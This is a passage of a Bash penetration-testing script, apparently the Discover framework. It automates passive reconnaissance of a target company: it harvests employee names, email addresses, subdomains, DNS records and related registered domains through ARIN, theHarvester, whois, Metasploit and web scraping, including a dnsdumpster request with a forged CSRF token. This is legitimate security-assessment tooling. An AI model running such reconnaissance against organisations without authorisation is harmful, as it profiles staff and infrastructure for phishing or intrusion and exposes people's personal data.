# Hector Portillo - report framework v3
# Ian Norden (@iancnorden) - report framework v2
# Martin Bos (@cantcomputer) - IDS evasion techniques
# Matt Banick - original development
# Numerous people on freenode IRC - #bash and #sed (e36freak)
# Rob Dixon (@304geek) - report framework concept
# Robert Clowser (@dyslexicjedi)- all things
# Saviour Emmanuel - Nmap parser
# Securicon, LLC. - for sponsoring development of parsers
# Steve Copland - report framework v1
# Arthur Kay (@arthurakay) - python scripts
##############################################################################################################
# Catch process termination
trap f_terminate SIGHUP SIGINT SIGTERM
# Global variables
home=$HOME
long='==============================================================================================================================='
medium='=================================================================='
short='========================================'
sip='sort -n -u -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4'
BLUE='\033[1;34m'
RED='\033[1;31m'
YELLOW='\033[1;33m'
NC='\033[0m'
# Check for instances of Discover >1
updatedb
locate discover.sh > tmpinstance
instqty=$(wc -l tmpinstance | cut -d ' ' -f1)
if [ $instqty -gt 1 ]; then
echo
echo -e "$medium ${NC}"
echo
echo -e "Found ${YELLOW}$instqty${NC} instances of Discover on your system."
echo 'Refer to the following paths:'
cat tmpinstance | sed 's/^/\t/'
echo
echo 'Remove or rename all but the install path and try again.'
echo -e "If renaming, ${YELLOW}'discover.sh'${NC} can't be in name. Try ${YELLOW}'discover.bu'${NC} etc."
echo
echo -e "${YELLOW}$medium ${NC}"
echo
rm tmpinstance
exit
else
rm tmpinstance
fi
# Check for OS X
if [[ `uname` == 'Darwin' ]]; then
browser=Safari
discover=$(locate discover.sh | sed 's:/[^/]*$::')
interface=en0
ip=$(ifconfig | grep 'en0' -A2 | grep 'inet' | cut -d ' ' -f2)
msf=/opt/metasploit-framework/bin/msfconsole
msfv=/opt/metasploit-framework/bin/msfvenom
port=4444
web="open -a Safari"
else
browser=Firefox
discover=$(updatedb; locate discover.sh | sed 's:/[^/]*$::')
interface=$(ip addr | grep 'global' | awk '{print $8}')
ip=$(ip addr | grep 'global' | cut -d '/' -f1 | awk '{print $2}')
msf=msfconsole
msfv=msfvenom
port=443
web="firefox -new-tab"
fi
##############################################################################################################
f_banner(){
echo
echo -e "${YELLOW}
_____ ___ _____ _____ _____ _ _ _____ _____
| \ | |____ | | | \ / |____ |____/
|_____/ _|_ _____| |_____ |_____| \/ |_____ | \_
By Lee Baird${NC}"
echo
echo
}
##############################################################################################################
f_error(){
echo
echo -e "${RED}$medium${NC}"
echo
echo -e "${RED} *** Invalid choice or entry. ***${NC}"
echo
echo -e "${RED}$medium${NC}"
sleep 2
f_main
}
f_errorOSX(){
if [[ `uname` == 'Darwin' ]]; then
echo
echo -e "${RED}$medium${NC}"
echo
echo -e "${RED} *** Not OS X compatible. ***${NC}"
echo
echo -e "${RED}$medium${NC}"
sleep 2
f_main
fi
}
##############################################################################################################
f_location(){
echo
echo -n "Enter the location of your file: "
read -e location
# Check for no answer
if [[ -z $location ]]; then
f_error
fi
# Check for wrong answer
if [ ! -f $location ]; then
f_error
fi
}
##############################################################################################################
f_runlocally(){
if [[ -z $DISPLAY ]]; then
echo
echo -e "${RED}$medium${NC}"
echo
echo -e "${RED} *** This option must be ran locally. ***${NC}"
echo
echo -e "${RED}$medium${NC}"
echo
echo
exit
fi
}
##############################################################################################################
f_terminate(){
save_dir=$home/data/cancelled-`date +%H:%M:%S`
echo
echo "Terminating..."
echo
echo -e "\e[1;33mAll data will be saved in $save_dir.\e[0m"
mkdir $save_dir
# Nmap and Metasploit scans
mv $name/ $save_dir 2>/dev/null
# Passive files
mv curl debug* email* hosts name* network* records registered* squatting sub* usernames-recon whois* z* doc pdf ppt txt xls $save_dir/passive/ 2>/dev/null
cd /tmp/; mv emails names* networks subdomains usernames $save_dir/passive/recon-ng/ 2>/dev/null
# Active files
mv active.rc emails hosts record* sub* waf whatweb z* $save_dir/active/ 2>/dev/null
cd /tmp/; mv subdomains $save_dir/active/recon-ng/ 2>/dev/null
echo
echo "Saving complete."
echo
echo
exit
}
##############################################################################################################
f_domain(){
clear
f_banner
echo -e "${BLUE}RECON${NC}"
echo
echo "1. Passive"
echo "2. Active"
echo "3. Import names into an existing recon-ng workspace"
echo "4. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1)
clear
f_banner
echo -e "${BLUE}Uses ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvester,${NC}"
echo -e "${BLUE} Metasploit, URLCrazy, Whois, multiple websites, and recon-ng.${NC}"
echo
echo -e "${BLUE}[*] Acquire API keys for Bing, Builtwith, Fullcontact, GitHub,${NC}"
echo -e "${BLUE} Google, Hashes, Hunter, SecurityTrails, and Shodan for${NC}"
echo -e "${BLUE} maximum results with recon-ng and theHarvester.${NC}"
echo
echo $medium
echo
echo "Usage"
echo
echo "Company: Target"
echo "Domain: target.com"
echo
echo $medium
echo
echo -n "Company: "
read company
# Check for no answer
if [[ -z $company ]]; then
f_error
fi
echo -n "Domain: "
read domain
# Check for no answer
if [[ -z $domain ]]; then
f_error
fi
companyurl=$( printf "%s\n" "$company" | sed 's/ /%20/g; s/\&/%26/g; s/\,/%2C/g' )
rundate=`date +%B' '%d,' '%Y`
total=37
# If folder doesn't exist, create it
if [ ! -d $home/data/$domain ]; then
cp -R $discover/report/ $home/data/$domain
sed -i "s/#COMPANY#/$company/" $home/data/$domain/index.htm
sed -i "s/#DOMAIN#/$domain/" $home/data/$domain/index.htm
sed -i "s/#DATE#/$rundate/" $home/data/$domain/index.htm
fi
echo
echo $medium
echo
echo "ARIN"
echo " Email (1/$total)"
wget -q https://whois.arin.net/rest/pocs\;domain=$domain -O tmp.xml
if [ -s tmp.xml ]; then
xmllint --format tmp.xml | grep 'handle' | cut -d '>' -f2 | cut -d '<' -f1 | sort -u > zurls.txt
xmllint --format tmp.xml | grep 'handle' | cut -d '"' -f2 | sort -u > zhandles.txt
while read x; do
wget -q $x -O tmp2.xml
xml_grep 'email' tmp2.xml --text_only >> tmp
done < zurls.txt
cat tmp | tr '[A-Z]' '[a-z]' | sort -u > zarin-emails
fi
rm tmp* 2>/dev/null
echo " Names (2/$total)"
if [ -e zhandles.txt ]; then
while read y; do
curl -s https://whois.arin.net/rest/poc/$y.txt | grep 'Name' >> tmp
done < zhandles.txt
egrep -v '(@|Network|Telecom)' tmp | sed 's/Name: //g' | tr '[A-Z]' '[a-z]' | sed 's/\b\(.\)/\u\1/g' > tmp2
awk -F", " '{print $2,$1}' tmp2 | sed 's/ / /g' | grep -v 'Admin' | sort -u > zarin-names
fi
rm zurls.txt zhandles.txt 2>/dev/null
echo " Networks (3/$total)"
wget -q https://whois.arin.net/rest/orgs\;name=$companyurl -O tmp.xml
if [ -s tmp.xml ]; then
xmllint --format tmp.xml | grep 'handle' | cut -d '/' -f6 | cut -d '<' -f1 | sort -uV > tmp
while read handle; do
echo " " $handle
curl -s https://whois.arin.net/rest/org/$handle/nets.txt > tmp2
if ! head -1 tmp2 | grep 'DOCTYPE' > /dev/null; then
awk '{print $4 "-" $6}' tmp2 >> tmp3
fi
done < tmp
fi
$sip tmp3 > networks-tmp 2>/dev/null
# Remove all empty files
find -type f -empty -exec rm {} +
rm tmp* 2>/dev/null
echo
echo "dnsrecon (4/$total)"
dnsrecon -d $domain > tmp
grep '*' tmp | egrep -v '(Bind Version|Checking|configured|DNSSEC|Enumerating|No SRV Records|Performing|PRIVATEDNS|Removing|Resolving|Servers found|SKEYs|Trying)' | sed 's/\[\*\]//g; s/^[ \t]*//' | column -t | sort -k1 > records
cat records >> $home/data/$domain/data/records.htm
grep $domain tmp | awk '{print $3 " " $4}' | awk '$2 !~ /[a-z]/' | grep -v '=' | column -t > sub-dnsrecon
# Remove all empty files
find -type f -empty -exec rm {} +
rm tmp 2>/dev/null
echo
echo "goofile (5/$total)"
python $discover/mods/goofile.py $domain doc > doc
python $discover/mods/goofile.py $domain docx | sort -u >> doc
python $discover/mods/goofile.py $domain pdf | sort -u > pdf
python $discover/mods/goofile.py $domain ppt > ppt
python $discover/mods/goofile.py $domain pptx | sort -u >> ppt
python $discover/mods/goofile.py $domain txt | sort -u > txt
python $discover/mods/goofile.py $domain xls > xls
python $discover/mods/goofile.py $domain xlsx | sort -u >> xls
# Remove all empty files
find -type f -empty -exec rm {} +
rm tmp* 2>/dev/null
echo
echo "goog-mail (6/$total)"
$discover/mods/goog-mail.py $domain | grep -v 'cannot' | tr '[A-Z]' '[a-z]' > zgoog-mail
# Remove all empty files
find -type f -empty -exec rm {} +
echo
echo "goohost"
echo " IP (7/$total)"
$discover/mods/goohost.sh -t $domain -m ip >/dev/null
echo " Email (8/$total)"
$discover/mods/goohost.sh -t $domain -m mail >/dev/null
cat report-* | grep $domain | column -t > zgoohost
rm *-$domain.txt tmp* 2>/dev/null
echo
echo "theHarvester"
cd /opt/theHarvester/
echo " Baidu (9/$total)"
python3 theHarvester.py -d $domain -l 100 -b baidu | egrep -v '(!|\*|--|\[|Searching|Warning|www)' | sed '/^$/d' > zbaidu
echo " Bing (10/$total)"
python3 theHarvester.py -d $domain -l 200 -b bing | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zbing
echo " Bing API (11/$total)"
python3 theHarvester.py -d $domain -l 200 -b bingapi | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zbingapi
echo " Censys (12/$total)"
python3 theHarvester.py -d $domain -l 100 -b censys | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zcensys
echo " crtsh (13/$total)"
python3 theHarvester.py -d $domain -l 100 -b crtsh | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zcrtsh
echo " Cymon (14/$total)"
python3 theHarvester.py -d $domain -l 100 -b cymon | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zcymon
echo " Dogpile (15/$total)"
python3 theHarvester.py -d $domain -l 100 -b dogpile | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zdogpile
echo " DuckDuckGo (16/$total)"
python3 theHarvester.py -d $domain -l 100 -b duckduckgo | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zduckduckgo
echo " Google (17/$total)"
python3 theHarvester.py -d $domain -l 100 -b google | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zgoogle
echo " Google-certificates (18/$total)"
python3 theHarvester.py -d $domain -l 100 -b google-certificates | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zgoogle-certificates
echo " Hunter (19/$total)"
python3 theHarvester.py -d $domain -l 100 -b hunter | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zhunter
echo " Intelx (20/$total)"
python3 theHarvester.py -d $domain -l 100 -b intelx | egrep -v '(!|\*|--|\[|Searching|Warning|/)' | sed '/^$/d' > zintelx
echo " Linkedin (21/$total)"
python3 theHarvester.py -d "$company" -l 100 -b linkedin | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > tmp
python3 theHarvester.py -d $domain -l 100 -b linkedin | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > tmp2
# Make first 2 columns title case.
cat tmp tmp2 | sed 's/\( *\)\([^ ]*\)\( *\)\([^ ]*\)/\1\L\u\2\3\L\u\4/' | sort -u > zlinkedin
echo " Netcraft (22/$total)"
python3 theHarvester.py -d $domain -l 100 -b netcraft | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > znetcraft
echo " SecurityTrails (23/$total)"
python3 theHarvester.py -d $domain -l 100 -b securityTrails | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zsecuritytrails
echo " ThreatCrowd (24/$total)"
python3 theHarvester.py -d $domain -l 100 -b threatcrowd | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zthreatcrowd
echo " VirusTotal (25/$total)"
python3 theHarvester.py -d $domain -l 100 -b virustotal | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zvirustotal
echo " Yahoo (26/$total)"
python3 theHarvester.py -d $domain -l 100 -b yahoo | egrep -v '(!|\*|--|\[|Searching|Warning)' | sed '/^$/d' > zyahoo
mv z* $discover
rm debug_results.txt stash.sqlite tmp* 2>/dev/null
# Remove all empty files
cd $discover/
find -type f -empty -exec rm {} +
echo
echo "Metasploit (27/$total)"
msfconsole -x "use auxiliary/gather/search_email_collector; set DOMAIN $domain; run; exit y" > tmp 2>/dev/null
grep @$domain tmp | awk '{print $2}' | grep -v '%' | grep -Fv '...@' > zmsf
# Remove all empty files
find -type f -empty -exec rm {} +
rm tmp 2>/dev/null
echo
echo "URLCrazy (28/$total)"
urlcrazy $domain > tmp
sed -n '/Character/,$p' tmp | sed 's/AUSTRALIA/Australia/g; s/AUSTRIA/Austria/g; s/BAHAMAS/Bahamas/g; s/BANGLADESH/Bangladesh/g;
s/BELGIUM/Belgium/g; s/BULGARIA/Bulgaria/g; s/CANADA/Canada/g; s/CAYMAN ISLANDS/Cayman Islands/g; s/CHILE/Chile/g; s/CHINA/China/g;
s/COLOMBIA/Columbia/g; s/COSTA RICA/Costa Rica/g; s/CZECH REPUBLIC/Czech Republic/g; s/DENMARK/Denmark/g; s/DOMINICAN REPUBLIC/Dominican Republic/g;
s/EUROPEAN UNION/European Union/g; s/FINLAND/Finland/g; s/FRANCE/France/g; s/GERMANY/Germany/g; s/HONG KONG/Hong Kong/g; s/HUNGARY/Hungary/g;
s/INDIA/India/g; s/INDONESIA/Indonesia/g; s/IRELAND/Ireland/g; s/ISRAEL/Israel/g; s/ITALY/Italy/g; s/JAPAN/Japan/g;
s/KOREA REPUBLIC OF/Republic of Korea/g; s/localhost//g; s/LUXEMBOURG/Luxembourg/g; s/NETHERLANDS/Netherlands/g; s/NORWAY/Norway/g; s/POLAND/Poland/g;
s/PORTUGAL/Portugal/g; s/PUERTO RICO/Puerto Rico/g; s/REPUBLIC OF China (ROC)/Republic of China/g; s/RUSSIAN FEDERATION/Russia /g;
s/SAUDI ARABIA/Saudi Arabia/g; s/SINGAPORE/Singapore/g; s/SPAIN/Spain/g; s/SWEDEN/Sweden/g; s/SWITZERLAND/Switzerland/g; s/TAIWAN/Taiwan/g;
s/THAILAND/Thailand/g; s/TURKEY/Turkey/g; s/UKRAINE/Ukraine/g; s/UNITED KINGDOM/United Kingdom/g; s/UNITED STATES/United States/g;
s/VIRGIN ISLANDS (BRITISH)/Brittish Virgin Islands/g; s/ROMANIA/Romania/g; s/SLOVAKIA/Slovakia/g; s/?/ /g' > tmp2
# Remove the last column
cat tmp2 | rev | sed 's/^[ \t]*//' | cut -d ' ' -f2- | rev > tmp3
cat tmp3 | sed 's/AU,//g; s/CA,//g; s/CH,//g; s/CN,//g; s/DE,//g; s/DK,//g; s/EU,//g; s/FR,//g; s/GB,//g; s/JP,//g; s/KR,//g; s/KY,//g; s/IN,//g;
s/IT,//g; s/NL,//g; s/NO,//g; s/PL,//g; s/PT,//g; s/RO,//g; s/RU,//g; s/SE,//g; s/SG,//g; s/TW,//g; s/US,//g; s/VG,//g' > tmp4
# Find domains that contain an IP
grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" tmp4 > squatting
rm tmp* 2>/dev/null
echo
##############################################################
echo "Whois"
echo " Domain (29/$total)"
whois -H $domain > tmp 2>/dev/null
# Remove leading whitespace
sed 's/^[ \t]*//' tmp > tmp2
# Clean up
egrep -iv '(#|%|<a|=-=-=-=|;|access may|accuracy|additionally|afilias except|and dns hosting|and limitations|any use of|be sure|at the end|by submitting|by the terms|can easily|circumstances|clientdeleteprohibited|clienttransferprohibited|clientupdateprohibited|company may|compilation|complaint will|contact information|contact us|contacting|copy and paste|currently set|database|data contained|data presented|database|date of|details|dissemination|domaininfo ab|domain management|domain names in|domain status: ok|enable high|except as|existing|failure|facsimile|for commercial|for detailed|for information|for more|for the|get noticed|get a free|guarantee its|href|If you|in europe|in most|in obtaining|in the address|includes|including|information is|is not|is providing|its systems|learn|makes this|markmonitor|minimum|mining this|minute and|modify|must be sent|name cannot|namesbeyond|not to use|note:|notice|obtaining information about|of moniker|of this data|or hiding any|or otherwise support|other use of|please|policy|prior written|privacy is|problem reporting|professional and|prohibited without|promote your|protect the|public interest|queries or|receive|receiving|register your|registrars|registration record|relevant|repackaging|request|reserves the|responsible for|restrictions|see business|server at|solicitations|sponsorship|status|support questions|support the transmission|supporting|telephone, or facsimile|Temporary|that apply to|that you will|the right| The data is|The fact that|the transmission|this listing|this feature|this information|this service is|to collect or|to entities|to report any|to suppress|transmission of|trusted partner|united states|unlimited|unsolicited advertising|users may|version 6|via e-mail|visible|visit aboutus.org|visit|web-based|when you|while believed|will use this|with many different|with no guarantee|we reserve|whitelist|whois|you agree|You may not)' tmp2 > tmp3
# Remove lines starting with "*"
sed '/^*/d' tmp3 > tmp4
# Remove lines starting with "-"
sed '/^-/d' tmp4 > tmp5
# Remove lines starting with http
sed '/^http/d' tmp5 > tmp6
# Remove lines starting with US
sed '/^US/d' tmp6 > tmp7
# Clean up phone numbers
sed 's/+1.//g' tmp7 > tmp8
# Remove leading whitespace from file
awk '!d && NF {sub(/^[[:blank:]]*/,""); d=1} d' tmp8 > tmp9
# Remove trailing whitespace from each line
sed 's/[ \t]*$//' tmp9 > tmp10
# Compress blank lines
cat -s tmp10 > tmp11
# Remove lines that end with various words then a colon or period(s)
egrep -v '(2:$|3:$|Address.$|Address........$|Address.........$|Ext.:$|FAX:$|Fax............$|Fax.............$|Province:$|Server:$)' tmp11 > tmp12
# Remove line after "Domain Servers:"
sed -i '/^Domain Servers:/{n; /.*/d}' tmp12
# Remove line after "Domain servers"
sed -i '/^Domain servers/{n; /.*/d}' tmp12
# Remove blank lines from end of file
awk '/^[[:space:]]*$/{p++;next} {for(i=0;i<p;i++){printf "\n"}; p=0; print}' tmp12 > tmp13
# Format output
sed 's/: /:#####/g' tmp13 | column -s '#' -t -n > whois-domain
rm tmp*
echo " IP (30/$total)"
curl -s https://www.ultratools.com/tools/ipWhoisLookupResult?ipAddress=$domain > ultratools
y=$(sed -e 's/^[ \t]*//' ultratools | grep -A1 '>IP Address' | grep -v 'IP Address' | grep -o -P '(?<=>).*(?=<)')
if ! [ "$y" = "" ]; then
whois -H $y > tmp
# Remove leading whitespace
sed 's/^[ \t]*//' tmp > tmp2
# Remove trailing whitespace from each line
sed 's/[ \t]*$//' tmp2 > tmp3
# Clean up
egrep -v '(\#|\%|\*|All reports|Comment|dynamic hosting|For fastest|For more|Found a referral|http|OriginAS:$|Parent:$|point in|RegDate:$|remarks:|The activity|the correct|this kind of object|Without these)' tmp3 > tmp4
# Remove leading whitespace from file
awk '!d && NF {sub(/^[[:blank:]]*/,""); d=1} d' tmp4 > tmp5
# Remove blank lines from end of file
awk '/^[[:space:]]*$/{p++;next} {for(i=0;i<p;i++){printf "\n"}; p=0; print}' tmp5 > tmp6
# Compress blank lines
cat -s tmp6 > tmp7
# Clean up
sed 's/+1-//g' tmp7 > tmp8
# Change multiple spaces to single
sed 's/ \+ / /g' tmp8 > tmp9
# Format output
sed 's/: /:#####/g' tmp9 | column -s '#' -t -n > whois-ip
rm tmp*
else
echo > whois-ip
fi
rm ultratools
echo
##############################################################
echo "crt.sh (31/$total)"
python parsers/parse-certificates.py $domain > tmp
cat tmp >> $home/data/$domain/data/certificates.htm
echo "</pre>" >> $home/data/$domain/data/certificates.htm 2>/dev/null
rm tmp
echo
echo "dnsdumpster.com (32/$total)"
curl -s https://dnsdumpster.com/static/map/$domain.png
sleep 15
wget -q https://dnsdumpster.com/static/map/$domain.png -O $home/data/$domain/assets/images/dnsdumpster.png
# Generate a random cookie value
rando=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1)
curl -s --header "Host:dnsdumpster.com" --referer https://dnsdumpster.com --user-agent "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" --data "csrfmiddlewaretoken=$rando&targetip=$domain" --cookie "csrftoken=$rando; _ga=GA1.2.1737013576.1458811829; _gat=1" https://dnsdumpster.com > tmp
dumpsterxls=$(grep 'xls' tmp | tr '"' ' ' | cut -d ' ' -f10)
wget -q $dumpsterxls -O tmp.xlsx
xlsx2csv tmp.xlsx tmp.csv
cat tmp.csv | sed 's/,"//g' | egrep -v '(Hostname|MX|NS)' | cut -d ',' -f1-2 | grep -v '"' | sed 's/,/ /g' | column -t | sort -u > sub-dnsdumpster
rm tmp*
echo
echo "email-format.com (33/$total)"
curl -s https://www.email-format.com/d/$domain/ > tmp
grep -o [A-Za-z0-9_.]*@[A-Za-z0-9_.]*[.][A-Za-z]* tmp | tr '[A-Z]' '[a-z]' | sort -u > zemail-format
rm tmp
echo
echo "intodns.com (34/$total)"
wget -q http://www.intodns.com/$domain -O tmp
cat tmp | sed '1,32d; s/<table width="99%" cellspacing="1" class="tabular">/<center><table width="85%" cellspacing="1" class="tabular"><\/center>/g; s/Test name/Test/g; s/ <a href="feedback\/?KeepThis=true&TB_iframe=true&height=300&width=240" title="intoDNS feedback" class="thickbox feedback">send feedback<\/a>//g; s/ background-color: #ffffff;//; s/<center><table width="85%" cellspacing="1" class="tabular"><\/center>/<table class="table table-bordered">/; s/<td class="icon">/<td class="inc-table-cell-status">/g; s/<tr class="info">/<tr>/g' | egrep -v '(Processed in|UA-2900375-1|urchinTracker|script|Work in progress)' | sed '/footer/I,+3 d; /google-analytics/I,+5 d' > tmp2
cat tmp2 >> $home/data/$domain/pages/config.htm
# Add new icons
sed -i 's|/static/images/error.gif|\.\./assets/images/icons/fail.png|g' $home/data/$domain/pages/config.htm
sed -i 's|/static/images/fail.gif|\.\./assets/images/icons/fail.png|g' $home/data/$domain/pages/config.htm
sed -i 's|/static/images/info.gif|\.\./assets/images/icons/info.png|g' $home/data/$domain/pages/config.htm
sed -i 's|/static/images/pass.gif|\.\./assets/images/icons/pass.png|g' $home/data/$domain/pages/config.htm
sed -i 's|/static/images/warn.gif|\.\./assets/images/icons/warn.png|g' $home/data/$domain/pages/config.htm
sed -i 's|\.\.\.\.|\.\.|g' $home/data/$domain/pages/config.htm
# Insert missing table tag
sed -i 's/.*<thead>.*/ <table border="4">\n&/' $home/data/$domain/pages/config.htm
# Add blank lines below table
sed -i 's/.*<\/table>.*/&\n<br>\n<br>/' $home/data/$domain/pages/config.htm
# Remove unnecessary JS at bottom of page
sed -i '/Math\.random/I,+6 d' $home/data/$domain/pages/config.htm
rm tmp*
echo
echo "robtex.com (35/$total)"
wget -q https://gfx.robtex.com/gfx/graph.png?dns=$domain -O $home/data/$domain/assets/images/robtex.png
echo
echo "Registered Domains (36/$total)"
f_regdomain(){
while read regdomain; do
whois -H $regdomain 2>&1 | sed -e 's/^[ \t]*//; s/ \+ //g; s/: /:/g' > tmp5
nomatch=$(grep -c -E 'No match for|Name or service not known' tmp5)
if [[ $nomatch -eq 1 ]]; then
echo "$regdomain -- No Whois Matches Found" >> tmp4
else
registrar=$(grep -m1 'Registrar:' tmp5 | cut -d ':' -f2 | sed 's/,//g')
regorg=$(grep -m1 'Registrant Organization:' tmp5 | cut -d ':' -f2 | sed 's/,//g')
regemail=$(grep -m1 'Registrant Email:' tmp5 | cut -d ':' -f2 | tr 'A-Z' 'a-z')
iptmp=$(ping -c1 $regdomain 2>&1)
if echo $iptmp | grep -q 'unknown host'; then
echo "$regdomain,No IP Found,$regemail,$regorg,$registrar" >> tmp4
else
ipaddr=$(echo $iptmp | grep 'PING' | cut -d '(' -f2 | cut -d ')' -f1)
echo "$regdomain,$ipaddr,$regemail,$regorg,$registrar" >> tmp4
fi
fi
let number=number+1
echo -ne " ${YELLOW}$number ${NC}of ${YELLOW}$domcount ${NC}domains"\\r
sleep 2
done < tmp3
}
# Get domains registered by company name and email address domain
curl -sL http://viewdns.info/reversewhois/?q=%40$domain > tmp
sleep 2
curl -sL http://viewdns.info/reversewhois/?q=$companyurl > tmp2
echo '111AAA--placeholder--' > tmp4
if grep -q 'There are 0 domains' tmp && grep -q 'There are 0 domains' tmp2; then
rm tmp tmp2
echo 'No Domains Found.' > tmp6
elif ! [ -s tmp ] && ! [ -s tmp2 ]; then
rm tmp tmp2
echo 'No Domains Found.' > tmp6
# Loop thru list of domains, gathering details about the domain
elif grep -q 'paymenthash' tmp; then
grep 'Domain Name' tmp | sed 's/<tr>/\n/g' | grep '</td></tr>' | cut -d '>' -f2 | cut -d '<' -f1 > tmp3
grep 'Domain Name' tmp2 | sed 's/<tr>/\n/g' | grep '</td></tr>' | cut -d '>' -f2 | cut -d '<' -f1 >> tmp3
sort -uV tmp3 -o tmp3
domcount=$(wc -l tmp3 | sed -e 's/^[ \t]*//' | cut -d ' ' -f1)
f_regdomain
else
grep 'ViewDNS.info' tmp | sed 's/<tr>/\n/g' | grep '</td></tr>' | grep -v -E 'font size|Domain Name' | cut -d '>' -f2 | cut -d '<' -f1 > tmp3
grep 'ViewDNS.info' tmp2 | sed 's/<tr>/\n/g' | grep '</td></tr>' | grep -v -E 'font size|Domain Name' | cut -d '>' -f2 | cut -d '<' -f1 >> tmp3
sort -uV tmp3 -o tmp3
domcount=$(wc -l tmp3 | sed -e 's/^[ \t]*//' | cut -d ' ' -f1)
f_regdomain
fi
# Formatting & clean-up
sort tmp4 | sed 's/111AAA--placeholder--/Domain,IP Address,Registration Email,Registration Org,Registrar,/' | grep -v 'Matches Found' > tmp6
grep "@$domain" tmp6 | sed 's/LLC /LLC./g' | column -n -s ',' -t > registered-domains
rm tmp*
echo
##############################################################
cat z* | grep '@' | grep -v '\.\.\.' | sort -u > emails
cat z* | grep ':' | sed 's/:/ /g; s/ empty//g' | column -t | sort -u > sub-theHarvester
cat z* | egrep -v '(@|:|\.)' | sort -u | cut -d '-' -f1 > tmp
if [ -e tmp ]; then
# Remove lines that start with .
sed '/^\./ d' tmp > tmp2
# Change to lower case
cat tmp2 | tr '[A-Z]' '[a-z]' > tmp3
# Clean up
egrep -v '(~|`|!|@|#|\$|%|\^|&|\*|\(|\)|_|-|\+|=|{|\[|}|]|\|:|;|"|<|>|\.|\?|/|abuse|academy|account|achievement|acquisition|acting|action|active|adjuster|admin|advanced|adventure|advertising|agency|alliance|allstate|ambassador|america|american|analysis|analyst|analytics|animal|another|antivirus|apple seems|application|applications|architect|archivist|article|assembler|assembling|assembly|asian|assignment|assistant|associate|association|attorney|audience|audio|auditor|australia|authority|automation|automotive|aviation|balance|bank|bbc|beginning|berlin|beta theta|between|big game|billion|bioimages|biometrics|bizspark|breaches|broker|builder|business|buyer|buying|california|cannot|capital|career|carrying|cashing|center|centre|certified|cfi|challenger|championship|change|chapter|charge|chemistry|china|chinese|claim|class|clearance|cloud|cnc|code|cognitive|college|columbia|coming|commercial|communications|community|company pages|competition|competitive|compliance|computer|comsec|concept|conference|config|connections|connect|construction|consultant|contact|contract|contributor|control|cooperation|coordinator|corporate|corporation|counsel|create|creative|critical|crm|croatia|cryptologic|custodian|cyber|dallas|database|day care|dba|dc|death toll|delivery|delta|department|deputy|description|designer|design|destructive|detection|develop|devine|dialysis|digital|diploma|direct|disability|disaster|disclosure|dispatch|dispute|distribut|divinity|division|dns|document|dos poc|download|driver|during|economy|ecovillage|editor|education|effect|electronic|else|email|embargo|emerging|empower|employment|end user|energy|engineer|enterprise|entertainment|entreprises|entrepreneur|entry|environmental|error page|ethical|example|excellence|executive|expectations|expertzone|exploit|expressplay|facebook|facilit|faculty|failure|fall edition|fast track|fatherhood|fbi|federal|fellow|filmmaker|finance|financial|fitter|forensic|forklift|found|freelance|from|frontiers in tax|fulfillment|full|function|future|fuzzing|germany|get control|global|gnoc|google|governance|government|graphic|greater|group|guard|hackers|hacking|harden|harder|hawaii|hazing|headquarters|health|help|history|homepage|hospital|hostmaster|house|how to|hurricane|icmp|idc|in the news|index|infant|inform|innovation|installation|insurers|integrated|intellectual|international|internet|instructor|insurance|intelligence|interested|interns|investigation|investment|investor|israel|items|japan|job|justice|kelowna|knowing|language|laptops|large|leader|letter|level|liaison|licensing|lighting|linguist|linkedin|limitless|liveedu|llp|local|looking|lpn|ltd|lsu|luscous|machinist|macys|malware|managed|management|manager|managing|manufacturing|market|mastering|material|mathematician|maturity|md|mechanic|media|medical|medicine|member|merchandiser|meta tags|methane|metro|microsoft|middle east|migration|mission|mitigation|mn|money|monitor|more coming|mortgage|motor|museums|mutual|national|negative|network|network|new user|newspaper|new york|next page|night|nitrogen|nw|nyc|obtain|occupied|offers|office|online|onsite|operations|operator|order|organizational|outbreak|owner|packaging|page|palantir|paralegal|partner|pathology|peace|people|perceptions|person|pharmacist|philippines|photo|picker|picture|placement|places|planning|police|portfolio|postdoctoral|potassium|potential|preassigned|preparatory|president|principal|print|private|process|producer|product|professional|professor|profile|project|program|property|publichealth|published|pyramid|quality|questions|rcg|recruiter|redeem|redirect|region|register|registry|regulation|rehab|remote|report|representative|republic|research|resolving|responsable|restaurant|retired|revised|rising|rural health|russia|sales|sample|satellite|save the date|school|scheduling|science|scientist|search|searc|sections|secured|security|secretary|secrets|see more|selection|senior|server|service|services|social|software|solution|source|special|sql|station home|statistics|store|strategy|strength|student|study|substitute|successful|sunoikisis|superheroines|supervisor|support|surveillance|switch|system|systems|talent|targeted|tax|tcp|teach|technical|technician|technique|technology|temporary|tester|textoverflow|theater|thought|through|time in|tit for tat|title|toolbook|tools|toxic|traditions|trafficking|transfer|transformation|treasury|trojan|truck|twitter|training|ts|tylenol|types of scams|unclaimed|underground|underwriter|university|united states|untitled|vault|verification|vietnam|view|Violent|virginia bar|voice|volkswagen|volume|vp|wanted|web search|web site|website|welcome|west virginia|westchester|when the|whiskey|window|worker|world|www|xbox|zz)' tmp3 > tmp4
cat tmp4 | sed 's/iii/III/g; s/ii/II/g' > tmp5
